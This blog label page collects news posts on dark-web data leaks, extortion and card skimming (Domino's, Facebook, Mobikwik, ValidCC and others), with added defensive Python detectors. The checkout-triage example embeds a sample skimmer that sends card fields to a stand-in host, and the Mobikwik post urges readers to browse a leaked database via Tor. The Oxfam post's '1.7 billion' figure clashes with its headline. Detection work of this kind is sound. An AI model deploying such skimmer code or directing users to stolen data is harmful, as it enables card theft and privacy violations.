Showing posts with label Dark Web.

Domino’s Data Leak Exposed Data of 18 Crore Orders

 

The well-known pizza chain Domino's has suffered another data leak this year, in which the details of 18 crore orders were made accessible on the dark web, according to security researchers.

A hacker alleged that earlier in April he had gained access to 13 TB of Domino's data. The leak reportedly includes data from more than 180,00,000 purchase orders, containing telephone numbers, e-mail addresses, billing information, and users' credit card details.

Domino's Pizza, Inc., commonly known as Domino's, is a multinational American pizza restaurant chain established in 1960. The F&B chain is particularly prominent in India, as seen in the smooth functioning of its operations despite the ongoing pandemic.

Rajshekhar Rajaharia, a security researcher, announced on Twitter that Domino's had been breached again, showing that the data of 18 crore orders had been made available after hackers built a search engine on the dark web; regular Domino's customers will most probably find their personal information there. The leaked information comprises users' names, e-mail addresses, telephone numbers, and even their GPS locations.

"Data of 18 crore orders of Domino's India have become public. Hacker created a search engine on Dark Web. If you have ever ordered @dominos_india online, your data might be leaked. Data include Name, Email, Mobile, GPS Location, etc," Rajaharia tweeted. 

The incident was first brought to light before the beginning of April by Alon Gal, CTO of the cybersecurity company Hudson Rock. He said that the users' data was being sold by hackers for about ten BTC, and that the hackers wanted to build a search engine so the data could be queried.

The compromised data reportedly includes 10 lakh credit card details and the addresses of people who have purchased from Domino's. However, in a statement given to Gadgets 360, Domino's India denied that any financial information of users had been leaked.

When Jubilant FoodWorks, the master franchise holder for Domino's in India, Nepal, Sri Lanka, and Bangladesh, was approached, it confirmed that the company had recently had a security incident but said that no financial details were exposed.

"Jubilant Food Works experienced an information security incident recently. No data about financial information of any person was accessed and the incident has not resulted in any operational or business impact."

"As a policy, we do not store financial details or credit card data of our customers, thus no such information has been compromised. Our team of experts is investigating the matter and we have taken necessary actions to contain the incident," the company spokesperson said.

Leaked Apple Schematics & Extortion Threats Removed From Dark Web

 

According to MacRumors, the ransomware group that stole schematics from Apple supplier Quanta Computer last week and threatened to release the trove of documents has mysteriously deleted all references to the extortion attempt from its dark web blog. 

Last Tuesday, the ransomware group REvil claimed that it had gained access to Quanta's internal computers and obtained some photographs and schematics of unreleased Apple products. The group requested $50 million from Quanta in order to retrieve the data. However, according to a statement posted on the hacker group's website on April 20, Quanta declined to pay the ransom, which led the criminals to turn their attention to Apple. 

To prove they had hacked into Quanta's servers and to increase the pressure on Apple, the hackers publicly posted a handful of images of unreleased product schematics, 21 images in total, showing different features of an alleged upcoming MacBook Pro, including an SD card slot, an HDMI port, and a MagSafe charger.

Unless Apple paid the $50 million ransom demand in return for removing the files, the group threatened to publish new data every day leading up to May 1. The extortion attempt was timed to coincide with Apple's "Spring Loaded" digital event on April 20, at which the company unveiled AirTag item trackers, new iPad Pro models, and new iMacs. Despite the threat, after the original demand was made public, no further stolen documents have been leaked online. 

REvil isn't known for bluffing and regularly shares stolen documents if its victims don't pay up, so it's unclear why the group didn't follow through this time. According to MacRumors, the photos were mysteriously deleted from their dark web location. The group has not stated why the photos were deleted, and all references to the blackmail attempt have been removed. 

Apple has yet to comment on the breach, although it has a history of refusing to deal with hackers. A hacker group tried to extort money from Apple in 2017 by holding consumer data hostage. "We do not reward cybercriminals for violating the law," Apple said at the time.

The group is still aggressively extorting other businesses, so it's unclear what caused it to delete all material related to the Quanta hack.

SOCTA: Here's a Quick Look into the Report by Europol

 

The Serious and Organised Crime Threat Assessment (SOCTA) 2021 by Europol summarises the criminal threat of the last four years and offers insights into what can be expected in the next four. Organized crime is not just cybercrime, but cybercrime is now a big component of organized crime. Europol sees the development of businesses, the growth of the digital lifestyle, and the rise of remote work as new vulnerabilities and opportunities for criminals to exploit.

“Critical infrastructures will continue to be targeted by cybercriminals in the coming years, which poses significant risks,” cautions the published report. “Developments such as the expansion of the Internet of Things (IoT), the increased use of artificial intelligence (AI), applications for biometrics data, or the availability of autonomous vehicles will have a significant impact. These innovations will create criminal opportunities.” 

The disruption of the Emotet botnet in January 2021, an international operation coordinated by Europol, is highlighted in the report. It involved the authorities of the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine. But the overall assessment is that cybercrime is growing in sophistication, with criminal gangs becoming increasingly organized, so the threat is multiplying rapidly. However, the Europol report says little about the usual cyber threats, apart from noting that crime syndicates increasingly sell them 'as a service'.

ENISA estimates that 230,000 new malware variants are detected each day, and Europol shows that the number and sophistication of attacks continue to increase. "The increase in the number of attacks on public institutions and large companies is particularly notable." Distributed denial of service (DDoS) is an expanding threat, frequently followed by extortion attempts. Attacks on government and critical resources continue, but criminal groups increasingly target smaller organizations with weaker security.

"Last year saw a multitude of damaging consequences from ransomware, breaches, and targeted attacks against sensitive data," comments Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber. Cyber attackers have taken full advantage of critical vulnerabilities to the detriment of organizations, in incidents ranging from hacks of COVID-19 research data to attacks on critical networks and government agencies. Online child exploitation, especially what is known as live distance abuse, also increased as students spent months at home during school closures. Europol states that it holds a database of over 40 million child sexual abuse images from around the globe.

Furthermore, the role of the dark web in illegal activity should not be underestimated; criminals use it to share knowledge on operational security. The use of the dark web for selling illicit drugs and weapons has increased over the past four years, but law enforcement action seems to have sown some mistrust among buyers and may have slowed that growth. Trafficking in human beings (THB) is also carried out on dark web and surface web pages, where labour and sex are the main categories. Europol says that THB is substantially underreported and that, in the EU, THB for labour exploitation is on the rise.

Fraud has also grown more technically sophisticated, with schemes such as investment fraud, BEC, non-deployment fraud, novelty fraud, fake invoice fraud, social profit fraud, and bank fraud, and this will probably continue. "The use of deep fakes will make it much more challenging to identify and counter fraud," warns Europol. The organized crime ecosystem is marked by a networked environment with smooth, systemic, and profitable coordination among criminals.

OTP Generating Firm at a Risk, as Hacker Claims to have Sold its Sensitive Data

 

A hacker appears to be selling confidential information claimed to have been stolen from an OTP firm, one that reportedly counts some of the most prominent technology and business giants among its customers, including Google, Facebook, Amazon, Emirates, Apple, Microsoft, Signal, Telegram, and Twitter.

A one-time password (OTP), also called a one-time PIN or dynamic password, is a password that is valid for only a single login session or transaction on a computer system or digital device. The same hacker also claims to have real-time access to the company's OTP system. The InfoSec researcher Rajshekhar Rajaharia, however, did not fully agree with the hacker's account of the suspected breach.

“The seller was active on the dark web forum for a long time claiming to sell live access to OTP and 2FA but from what we have seen there are some chances that the data might be old as we have found some clues that changes have been made with dates. Nevertheless, we are still investigating because data seems real otherwise,” stated Rajaharia. 

Rajaharia also provided sample data confirming the presence of one-time codes; even if not all of them are current or valid, a buyer could still learn a great deal about the platform and its policies. The listing offered 50 GB of exfiltrated data, among other details. The price of access was reduced from $18,000 to $5,000 as an introductory offer. Although the company's name appears in the listing, it is not disclosed here for security reasons.

Other details included in the sale package are PII, including SMS logs, mobile numbers, e-mail addresses, SMPP details, customer documentation, and more. The data is comprehensive and dates back to 2017. According to the latest reports, the seller moved the listing from the dark web marketplace to Telegram, where sales continued, though the number of buyers is unknown. The data packs also appear to contain 10 million OTPs.

The company in question denied all data breach claims, stating that its systems were as secure as ever and that it could not verify the authenticity of the alleged data.

The company also sent a letter to the National Stock Exchange of India, which reads, "We would like to highlight that unverified posts and claims are being circulated about an alleged data breach at [company's name retracted]. Based on the evidence we have seen thus far, it is not from any of our current systems, and therefore we cannot verify the authenticity of the alleged data breach."

However, the company stated that it had engaged a third-party expert to support its system audit, so that any web shell present would be noticed and removed.

533 Million Facebook Users' Phone Numbers And Personal Data Leaked Online

 

On Saturday, a user on a low-level hacking forum leaked the personal information of hundreds of millions of Facebook users free of charge. The exposed data covers over 533 million Facebook users from 106 countries – around 32 million from the US, 11 million from the UK, and around 6 million from India. The leaked data includes users' full names, dates of birth, locations, phone numbers, Facebook IDs, bios, and in some cases email addresses.

Alon Gal, CTO of the cybercrime intelligence firm Hudson Rock, analyzed the breach on Saturday and reported it on Twitter. Gal had earlier found that the same leaked database was accessible via a Telegram bot in January.

Back then, the situation was different: the hacker behind the Telegram bot was selling the data to clients willing to pay for it, whereas this time the data of more than 533 million people is available to everyone for free on a low-level hacking forum.

“A database of that size containing the private information such as phone numbers of a lot of Facebook’s users would certainly lead to bad actors taking advantage of the data to perform social engineering attacks [or] hacking attempts,” Alon Gal stated. 

The incident is not new for Facebook, which is a frequent target of cyberattacks. Before this one, the platform had already experienced several notable data breaches.

A vulnerability spotted in 2019 allowed sensitive information of millions of Facebook users, including their phone numbers, to be scraped from Facebook's servers in contravention of its terms of service. Facebook stated at the time that the vulnerability was patched in August 2019. Facebook had also vowed to eliminate mass data scraping after Cambridge Analytica scraped over 80 million users' data in violation of Facebook's terms of service to target voters with political ads in the 2016 election.

Hacker Hacks Underground Covid Vaccine Market On Dark Web

 

In a recent incident, an attacker hacked a vaccine marketplace running on the dark web. The attacker then placed fake orders and cancelled them, collecting refunds in Bitcoin worth $752,000, according to a report released on Thursday. As per a post on the market's forum, the attacker found a way to place fake orders, cancel them immediately using the trader's seller account, and trigger refunds, which were withdrawn instantly.

Check Point Research says the method allowed the hacker to make 13 Bitcoin (BTC), equal to $752,000. The dark web marketplace that was selling these products is currently down because of the hack. But the attack has not stopped the sale of Covid-19 related products on the dark web. Following the marketplace shutdown, another hacking forum was set up at the same address, offering various ads including Covid-19 vaccines (documents included), at heavy promotional discounts.

Cybersecurity experts recently found that fake Covid-19 vaccine certificates and fake Covid-19 test results were being sold on the dark web and hacking platforms for as little as Rs 1,800 ($25) and up to Rs 18,000 ($250), aimed at people looking to book flights, cross borders, find a new job, or attend an event. An interested buyer simply sends their details and payment to the seller on the dark web, and the seller e-mails back the forged documents for $250.

Research from Check Point revealed that fake negative Covid-19 test results are available on the dark web for as little as $25. Covid-19 vaccine ads on the darknet have tripled over the last three months. The selling forums are based in European countries such as Spain, Russia, France, and Germany. According to experts, "The vaccines advertised include Oxford-AstraZeneca (at $500), Johnson & Johnson ($600), the Russian Sputnik vaccine ($600) and the Chinese SINOPHARM vaccine." Check Point Research says, "as a result, the marketplace is down completely since, and at this point of time is yet to be restored online."

Here's How to Safeguard Against Mobikwik Data Breach

 

Cybersecurity researchers claimed that the KYC data of as many as 11 crore Mobikwik users had been leaked and put up for sale on the dark web. However, the Gurugram-based digital wallet company denies the breach, stating that it has found no evidence of a data leak.

Rajshekhar Rajaharia, an independent cybersecurity researcher, was the first to disclose the data leak in February. He said that bank details, email addresses, and other sensitive details of nearly 11 crore Indians had been leaked on the dark web.

Approximately 8 terabytes (TB) of personal user information were stolen from Mobikwik's main server by a hacker using the name 'Jordan Daven' and put on dark web platforms on January 20, Rajaharia stated. As evidence, Jordan Daven emailed a link to the stolen database to PTI, stating that they had no motive for using the data other than to obtain it from the company and delete it from their end, and also shared the private details of Mobikwik founder Bipin Preet Singh and CEO Upasana Taku from the stolen database.

When approached, Mobikwik denied the claims and stated, "the company is subjected to stringent compliance measures under its PCI-DSS and ISO Certifications which includes annual security audits and quarterly penetration tests to ensure the security of its platform. As soon as this matter was reported, the company undertook a thorough investigation with the help of external security experts and did not find any evidence of breach."

Precautionary measures for Mobikwik users 

To check whether your data has been compromised, you have to download the Tor browser, a free and open-source browser that lets you browse the web anonymously. You should also update your Mobikwik account by setting a new password and enabling two-factor authentication.

Open this link to access the entire leaked database that is now online. Search for your data using your email id or contact number. If nothing shows up, you are safe; if something does, you should immediately contact your bank and block your cards.

Threat Actor Targets Guns.com, Spills Sensitive Information on Dark Web

 

As the domain name suggests, Guns.com is a major Minnesota, US-based platform to buy and sell guns online. It is also home to news and updates for firearm owners and lovers around the globe. However, on March 9th, 2021, a database seemingly belonging to Guns.com was dumped on the popular dark web site ‘Raid Forums’.

Earlier this week, a large cache of files allegedly stolen from Guns.com also appeared on Raid Forums. The hackers behind this data dump claimed that the files contain a complete database of Guns.com along with its source code. They further added that the breach took place around the end of 2020 and that the data was sold privately, that is, on Telegram channels or dark web forums.

According to Hackread.com's analysis, the data dump contains substantial gun buyer information, including user IDs, full names, nearly 400,000 email addresses, password hashes, physical addresses, zip codes, cities, states, Magento IDs, contact numbers, and account creation dates.

One of the folders in the leaked database includes customers' bank account details, including full name, bank name, account type, and Dwolla IDs. However, credit card numbers and VCC numbers were not leaked.

The data dump also contains Guns.com login credentials: an Excel file in the database appears to contain sensitive login details for Guns.com, including its administrator's WordPress, MySQL, and cloud (Azure) credentials. However, it is unclear whether these credentials are current, outdated, or have already been changed by the site's administrators following the breach.

This could have a devastating effect on the company, since all admin credentials, including admin emails, passwords, login links, and server addresses, are stored in plain text. With this kind of sensitive information available, a skilled attacker could carry out identity fraud or target victims with phishing scams and other malicious activity.

Insider Trading Threats on Dark Web

 

Insider trading can now be carried out more effectively than ever, largely because of the continuing proliferation of encrypted and anonymous messaging services and the existence of dark web and underground networks that let threat actors find co-conspirators and communicate with them. Historically, a few dark web forums catered to the trafficking of non-public corporate data; today, newer technology allows these activities to be conducted with much greater operational security.

Financially motivated threat actors or disgruntled employees can now trade data away from the prying eyes of law enforcement and security researchers, allowing only vetted individuals to access the sensitive information provided by insiders.

Moreover, the clearnet hosts many market trading enthusiast groups on platforms such as Reddit and Discord, ranging in size from thousands to millions of users. Insikt Group found "stock signals" services that give paying clients tips on which trades to make based on the recommendations of "analysts". Given that the source of this information is unclear, the unregulated nature of these services and their use of anonymous messaging services is concerning.

One of the historically significant sites was The Stock Insiders, a Tor-based site active from April 2016 until August 2018. As the name suggests, the site was created to build a community of users with insider access at publicly traded companies who would share it with other users to inform the stock trades of the larger group. The site has long been inactive, the administrator does not respond to private messages, and there have been no updates to the main page since early 2018. The reason operations stopped has not been clarified, but it does not appear to be the result of a law enforcement takedown, since the website is still technically up.

While the site is no longer active, it still offers an instructive view of how its operations were conducted. The Stock Insiders has a couple of visible posts instructing users on how to register an account and listing the requirements for full membership.

What are Smishing Attacks? How to Prevent Them?

 

Smishing is a cyber attack that uses SMS text messages to deceive victims into handing sensitive data to a cybercriminal. Sensitive data includes your account name and password, your name, your bank account, or your credit card numbers. The cybercriminal may also embed a shortened URL in the text message, inviting the recipient to tap the link, which in most cases redirects to a malicious site. Smishing is related to two other phishing-style attacks, phishing (by e-mail) and vishing (by voice call).

Cybercriminals today are primarily motivated by financial gain. They create code designed to obtain your sensitive data for profit. Once they have this information, they may seek to sell your compromised credit card or credentials on the dark web. They may also use the sensitive information to open an account in your name or hold your information for ransom in exchange for a large payout.

Back in May 2018, Fifth Third Bank customers were the targets of a smishing attack. The attackers claimed to represent Fifth Third Bank and warned customers that their accounts were locked. The body of the text message contained a link for customers to unlock their accounts. The link took unsuspecting customers to a fake webpage that resembled Fifth Third's genuine site. The phishing site prompted visitors to enter their username and password, one-time code, and PIN to unlock their account. The cybercriminals then used the stolen account data to withdraw almost $68,000 from 17 ATMs across three states.

Some of the ways to prevent smishing attacks are: 

• Do not respond to text messages that request private or financial information from you.

• If you receive a message that appears to be from your bank, financial institution, or another entity you do business with, contact that business directly to determine whether it sent you a genuine request. Review the entity's policy on sending text messages to customers.

• If a text message urges you to act or respond quickly, pause and consider the bigger picture. Remember that criminals use urgency as a tactic to get you to do what they want.

• Never reply to a suspicious text message without doing your research and checking the source.
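As an added defensive illustration (not from the original post), here is a small Python heuristic that scores an SMS body on the signals the text above describes: a shortened or off-brand link, urgency language, and a request for credentials. The shortener list, the phrase lists, the `bank.example` domain and the sample messages are all constructed for the example; a real deployment would use curated lists and treat the score as a triage aid, not a verdict.

```python
import re
from dataclasses import dataclass, field

# Constructed, deliberately short lists for the example; a real deployment
# would maintain curated ones.
SHORTENER_DOMAINS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "ow.ly"}
URGENCY_PHRASES = ("locked", "suspended", "immediately", "within 24 hours",
                   "verify now", "act now", "urgent")
CREDENTIAL_PHRASES = ("password", "pin", "one-time code", "otp",
                      "card number", "ssn")

# Matches http(s) URLs and bare "host.tld/path" links as they appear in SMS bodies.
URL_RE = re.compile(r"https?://[^\s<>\"']+|\b[a-z0-9.-]+\.[a-z]{2,}/[^\s]*",
                    re.IGNORECASE)


@dataclass
class SmsVerdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Threshold chosen for the example: one strong signal plus one weak one.
        return self.score >= 3


def extract_urls(text: str) -> list:
    return URL_RE.findall(text)


def domain_of(url: str) -> str:
    host = re.sub(r"^https?://", "", url, flags=re.IGNORECASE).split("/")[0]
    return host.lower()


def _contains_phrase(text: str, phrases) -> bool:
    # Whole-word match so that "pin" does not fire on "shopping".
    return any(re.search(r"\b" + re.escape(p) + r"\b", text) for p in phrases)


def score_sms(text: str, claimed_sender_domains=()) -> SmsVerdict:
    """Score one SMS body. claimed_sender_domains are the domains the
    organisation the message claims to come from really uses."""
    lowered = text.lower()
    verdict = SmsVerdict()
    for url in extract_urls(text):
        dom = domain_of(url)
        if dom in SHORTENER_DOMAINS:
            verdict.score += 2
            verdict.reasons.append(f"shortened link: {url}")
        elif claimed_sender_domains and not any(
                dom == d or dom.endswith("." + d) for d in claimed_sender_domains):
            verdict.score += 2
            verdict.reasons.append(f"link host {dom} is not the claimed sender's")
    if _contains_phrase(lowered, URGENCY_PHRASES):
        verdict.score += 1
        verdict.reasons.append("urgency language")
    if _contains_phrase(lowered, CREDENTIAL_PHRASES):
        verdict.score += 2
        verdict.reasons.append("asks for credentials or card data")
    return verdict


if __name__ == "__main__":
    # Constructed messages modelled on the bank-alert lure described above.
    samples = [
        "Alert: Your account has been locked. Verify now at bit.ly/xyz123 with your PIN to unlock.",
        "Your statement is ready at https://www.bank.example/statements",
    ]
    for s in samples:
        v = score_sms(s, claimed_sender_domains=("bank.example",))
        print(v.suspicious, v.score, v.reasons)
```

The first sample message trips all three signals (shortened link, "locked"/"verify now", a request for a PIN) and scores 5; the second, which links only to the claimed sender's own domain and asks for nothing, scores 0. The link-host check is the one that matters most in practice: a lookalike domain such as `bank-example-secure.net` is flagged even when no shortener is involved.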

WeLeakInfo's Customer Records Leaked

 

WeLeakInfo.com was a data breach notification service that allowed its customers to check whether their credentials had been compromised in data breaches. The service claimed a database of more than 12 billion records from over 10,000 data breaches. In mid-2020, a joint operation led by the FBI in coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland resulted in the seizure of the WeLeakInfo.com domain.

The U.S. Department of Justice announced in January that it had seized weleakinfo.com, which had existed since 2017. The site sold various subscription levels, making it possible for scammers to access and search the database. Two 22-year-old men, one in the Netherlands and the other in Northern Ireland, were arrested in connection with running the site, according to the Dutch media outlet Nu.nl.

The site additionally vowed to alert members if their own data was stolen and uploaded to the database, with a feature called “Asset Monitoring.” “Get notified when your information is detected in a data breach,” the sales pitch said, according to an archived version of the homepage. “Stay one step ahead of hackers.” 

WeLeakInfo and other sites like it essentially operate as a malicious version of HaveIBeenPwned, a database where visitors can check whether their data has been compromised. HaveIBeenPwned lets users determine whether an email address has been included in various data breaches.

Security researchers from Cyble observed that a member of a hacking forum claimed to have registered one of WeLeakInfo's domains, wli.design, which was registered again on March 11, 2021. The actor then created an email address on the domain and used it to access the cybercrime group's account on the payment service Stripe. Access to the Stripe account allowed the actor to obtain customers' details, including email, address, partial card details, and purchase history.

“The WeLeakInfo operators allegedly used the domain’s email address for payments via Stripe, the actor claimed. The actor claimed to have registered the domain and then created an email address on the registered domain used in their Stripe account gaining access to WeLeakInfo customers details.” reads the post published by Cyble.

Bug in Brave Browser Expose Users’ Dark Web History

 

Brave, the web browser that emphasizes privacy, was exposing its users' activity on Tor hidden services, or the "dark web", to their Internet service providers. Brave has fixed a privacy bug in its browser that sent queries for .onion domains to a DNS resolver instead of routing them through a Tor circuit, so that visits to dark web sites were visible to third parties. The bug was addressed in a hotfix release.

Brave is an open-source web browser based on Chromium, created by Brave Software, Inc. It blocks advertisements and website trackers and gives users a way to send cryptocurrency donations to websites and content creators in the form of tokens.

Introduced in June 2018, Brave's Tor mode has let users browse anonymously and access the .onion versions of legitimate websites such as Facebook, Wikipedia, and major news outlets. However, an unnamed security researcher reported that Brave's Tor mode was sending queries to DNS resolvers on the open Internet rather than through Tor nodes. DNS requests are unencrypted, so attempts to access .onion sites from Brave's Tor mode could be monitored, which directly contradicts the purpose of the feature.

The DNS leak is dangerous because every leaked query leaves a footprint of the Brave user's Tor activity in DNS server logs. The risk is significant: while in stable Western democracies it might not be troublesome, it may be a real concern for users browsing .onion sites in Brave's Tor mode from authoritarian regimes.

The problem appears to stem from the browser's CNAME ad-blocking feature, which blocks third-party tracking scripts that hide behind CNAME DNS records to pose as first-party scripts and evade blocker detection. CNAME cloaking lets a website disguise third-party scripts as subdomains of its primary domain that are then resolved to a tracking domain.

Over the last three years, the company has worked to make Brave one of the most privacy-focused web browsers available, second only to Tor Browser.

A Brave developer stated after the report was published that the browser had received a hotfix for the problem. The issue had already been fixed in the browser's nightly development build.

"Since it's now public we're uplifting the fix to a stable hotfix. Root cause is regression from CNAME-based adblocking which used a separate DNS query," he added.
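The leak described above shows up in exactly one place a defender can look: a resolver's query log should never contain a name ending in .onion, because that top-level domain is reserved for Tor (RFC 7686) and is meant to be handled by the Tor client, never sent to DNS. The following Python script is an added example, not Brave's or the researcher's code. It parses a simplified, constructed query-log format (an assumption; adapt the regular expression to your resolver's actual log layout) and lists which clients are sending .onion lookups to the resolver.

```python
import re
from collections import Counter

# Constructed sample in a simplified resolver query-log format (not real
# logs and not any particular resolver's exact layout):
# timestamp, client address#port, qname, qtype.
SAMPLE_LOG = """\
19-Feb-2021 10:00:01.123 client 192.0.2.10#51234: query: www.example.com IN A +
19-Feb-2021 10:00:02.456 client 192.0.2.10#51235: query: exampleabcdef1234567.onion IN A +
19-Feb-2021 10:00:03.789 client 192.0.2.11#40001: query: news.example.net IN AAAA +
19-Feb-2021 10:00:04.012 client 192.0.2.10#51236: query: EXAMPLEABCDEF1234567.ONION. IN AAAA +
19-Feb-2021 10:00:05.345 client 192.0.2.12#40002: query: onion.example.org IN A +
"""

QUERY_RE = re.compile(
    r"client (?P<client>[0-9a-fA-F.:]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def is_onion_name(qname: str) -> bool:
    """True when the name's final label is 'onion' (the RFC 7686 reserved TLD).
    Handles a trailing dot and mixed case; 'onion.example.org' is not flagged."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-1] == "onion"


def parse_query_line(line: str):
    """Return a dict with client, qname and qtype, or None for non-query lines."""
    m = QUERY_RE.search(line)
    return m.groupdict() if m else None


def find_onion_leaks(log_text: str) -> list:
    """Return the parsed records whose qname should never have reached a resolver."""
    leaks = []
    for line in log_text.splitlines():
        rec = parse_query_line(line)
        if rec and is_onion_name(rec["qname"]):
            leaks.append(rec)
    return leaks


def leaking_clients(log_text: str) -> Counter:
    """Map client address -> number of leaked .onion lookups, for triage."""
    return Counter(rec["client"] for rec in find_onion_leaks(log_text))


if __name__ == "__main__":
    for client, n in leaking_clients(SAMPLE_LOG).most_common():
        print(f"{client}: {n} .onion lookups sent to the resolver")
```

On the constructed sample, only 192.0.2.10 is flagged (two lookups); the query for onion.example.org is left alone because "onion" is not its final label. The same check works on a resolver's real logs, and a non-zero count from a host that is supposed to be using Tor is a direct indicator of a client-side leak of the kind this post describes.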

Oxfam Australia 1.7 Million users Compromise with the Data Breach

 

Recently, a hacking group has reportedly compromised the data of 1.7 billion users, an incident now being investigated by Oxfam Australia, a humanitarian non-profit organization that suffered a data breach and a blatant violation of privacy.

Oxfam Australia is a secular organization focused on development and aid. It is an autonomous organization operating within the broader Oxfam umbrella to eradicate poverty across Australia, Asia, Africa, and the Middle East.

The organization said in a statement on Thursday, 4 February, that it had been informed of the data breach at the end of the previous week and had immediately launched an investigation to uncover the motives, origins, and damage incurred.

Oxfam Australia is investigating a possible privacy breach after a threat actor claimed to be selling its database on a hacker website. The dark web database sample contains email addresses, names, physical addresses, telephone numbers, and donation amounts, all of which appear to be genuine supporter data; one record in the threat actor's pooled sample contains real donor data. Although it is still unknown whether any data was compromised, it emerged earlier this week that a threat actor was trying to sell the charity's database. Forensic experts were asked to help determine whether data was accessed and whether supporters were affected. Oxfam Australia said it is currently investigating the breach and has reported it to the Australian Cyber Security Centre (ACSC) and the Office of the Australian Information Commissioner (OAIC).

"Late last week, Oxfam Australia was alerted to a suspected data incident. Oxfam immediately launched an investigation and engaged market-leading experts to assist in identifying whether data may have been accessed and any impact on its supporters." 

Chief Executive Lyn Morgain said, “Oxfam Australia had reported the matter to the Australian Cyber Security Centre (ACSC) and the Office of the Australian Information Commissioner (OAIC) while continuing to investigate the suspected incident.” 

Oxfam has contacted supporters and stakeholders to warn them of the suspected breach. The breach has not been officially confirmed, but the detail in the threat actor's listing suggests that data was indeed exposed. 

Donors and registered users of Oxfam Australia's platform should change their passwords, and change them on any other site where the same password was reused. The exposed data is also well suited to targeted phishing: supporters should treat unsolicited messages that claim to come from Oxfam, particularly any that ask for further personal details, with suspicion. 

Morgain added that “We are committed to communicating quickly to our supporters once the facts have been established, and we will provide updates as we learn more.”

E-Commerce Theft: Dark Web Card Payment Store ValidCC Shut Down


ValidCC, a dark web shop run by a cybercrime group that had been hacking online merchants and stealing payment card data for more than six years, shut down abruptly last week. Its operators say a law enforcement operation seized the store's servers. Many underground shops sell "card not present" (CNP) data stolen from e-commerce sites, but most of them buy that data from other cybercriminals rather than stealing it themselves.  

ValidCC was different: researchers believe the group behind the shop hacked hundreds of e-commerce merchants itself, seeding their sites with hidden card-skimming JavaScript that captured personal and payment details as customers went through checkout. Group-IB, a cybersecurity firm founded in Russia and now headquartered in Singapore, published a report last year describing the operation. It attributes ValidCC to a group it calls UltraRank, which it says compromised around 700 online stores as well as 13 third-party suppliers of software components to those stores across Europe, the Americas and Asia.  
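A skimmer of the kind described above has to do two things on the checkout page: read the card fields, and send what it read to a host the merchant does not control. The script below is an added example, not code from the page, from Group-IB or from the actors discussed; it triages the scripts on a checkout page for that pair of behaviours, flags third-party scripts for review, and emits a Subresource Integrity hash for each inline script so a known-good baseline can be pinned in a Content-Security-Policy and diffed on every deploy. The HTML, the host names and the regular expressions are all constructed for the example.

```python
"""Heuristic triage of checkout-page scripts for JS-sniffer behaviour (added example)."""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a skimmer must touch, and the ways a script can send data off-page.
# Both lists are illustrative; real skimmers are usually obfuscated.
FIELD_RE = re.compile(r"card_?number|ccnum|cvv|cvc|expir|cardholder", re.I)
SEND_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b|\.src\s*=")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element in a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def sri_hash(source):
    """SRI token for an inline script, usable in a CSP script-src allow-list."""
    return "sha384-" + base64.b64encode(hashlib.sha384(source.encode()).digest()).decode()


def external_hosts(source, first_party):
    """Hosts named by URL literals in the script that are not the merchant's own."""
    return sorted({h.lower() for h in URL_RE.findall(source) if h.lower() not in first_party})


def triage(html, first_party):
    """Return one finding per script: 'suspect', 'review' or 'ok'."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:
            host = (urlparse(src).hostname or "").lower()  # relative src is first-party
            verdict = "ok" if not host or host in first_party else "review"
            findings.append({"script": src, "verdict": verdict,
                             "reason": "third-party script on checkout page" if verdict == "review" else ""})
            continue
        hosts = external_hosts(body, first_party)
        if FIELD_RE.search(body) and SEND_RE.search(body) and hosts:
            findings.append({"script": "inline", "verdict": "suspect",
                             "reason": f"reads card fields and sends to {hosts}", "sri": sri_hash(body)})
        else:
            findings.append({"script": "inline", "verdict": "ok", "reason": "", "sri": sri_hash(body)})
    return findings


# Constructed checkout page: one skimmer, one benign inline script, one relative
# and one third-party script. shop.example is the (assumed) first-party host.
SAMPLE_HTML = """<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"><input name="expiry"></form>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=card_number]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://cdn-stats.example.invalid/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
<script>fetch('https://shop.example/api/cart').then(r => r.json());</script>
<script src="/static/checkout.js"></script>
<script src="https://js.psp.example/v3"></script>
</body></html>"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML, {"shop.example"}):
        print(finding)
```

The regular expressions catch only the plainest skimmers, which is why the durable controls are the SRI hashes and a CSP whose `connect-src`, `img-src` and `form-action` directives name the merchant's own hosts and its payment provider and nothing else; the triage is a cheap first pass to run across many storefronts.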

Group-IB believes UltraRank orchestrated a series of attacks that other security firms had previously attributed to three separate cybercrime groups. "Over five years….UltraRank changed its infrastructure and malicious code on numerous occasions, as a result of which cybersecurity experts would wrongly attribute its attacks to other threat actors,” Group-IB said, adding that “UltraRank combined attacks on single targets with supply chain attacks.” ValidCC's representative on underground forums, a hacker using the handle SPR, told customers on 28 January that the shop was closing following a law enforcement operation against its infrastructure. 

According to SPR, ValidCC lost access to more than 600,000 unsold payment card records, a heavy blow to the store's inventory: with its proxy and destination servers gone, SPR says, the store can no longer open and decrypt its back end. Group-IB reports, "the store’s official representative on underground forums is a user with the nickname SPR. In many posts, SPR claims that the card data sold in the ValidCC store was obtained using JS sniffers. Most of SPR’s posts are written in English, however, SPR often switches to Russian, while communicating with customers. This might indicate that ValidCC is probably managed by a Russian speaker."  

Data Related to Thousands of Foxtons Clients Leaked Online

 

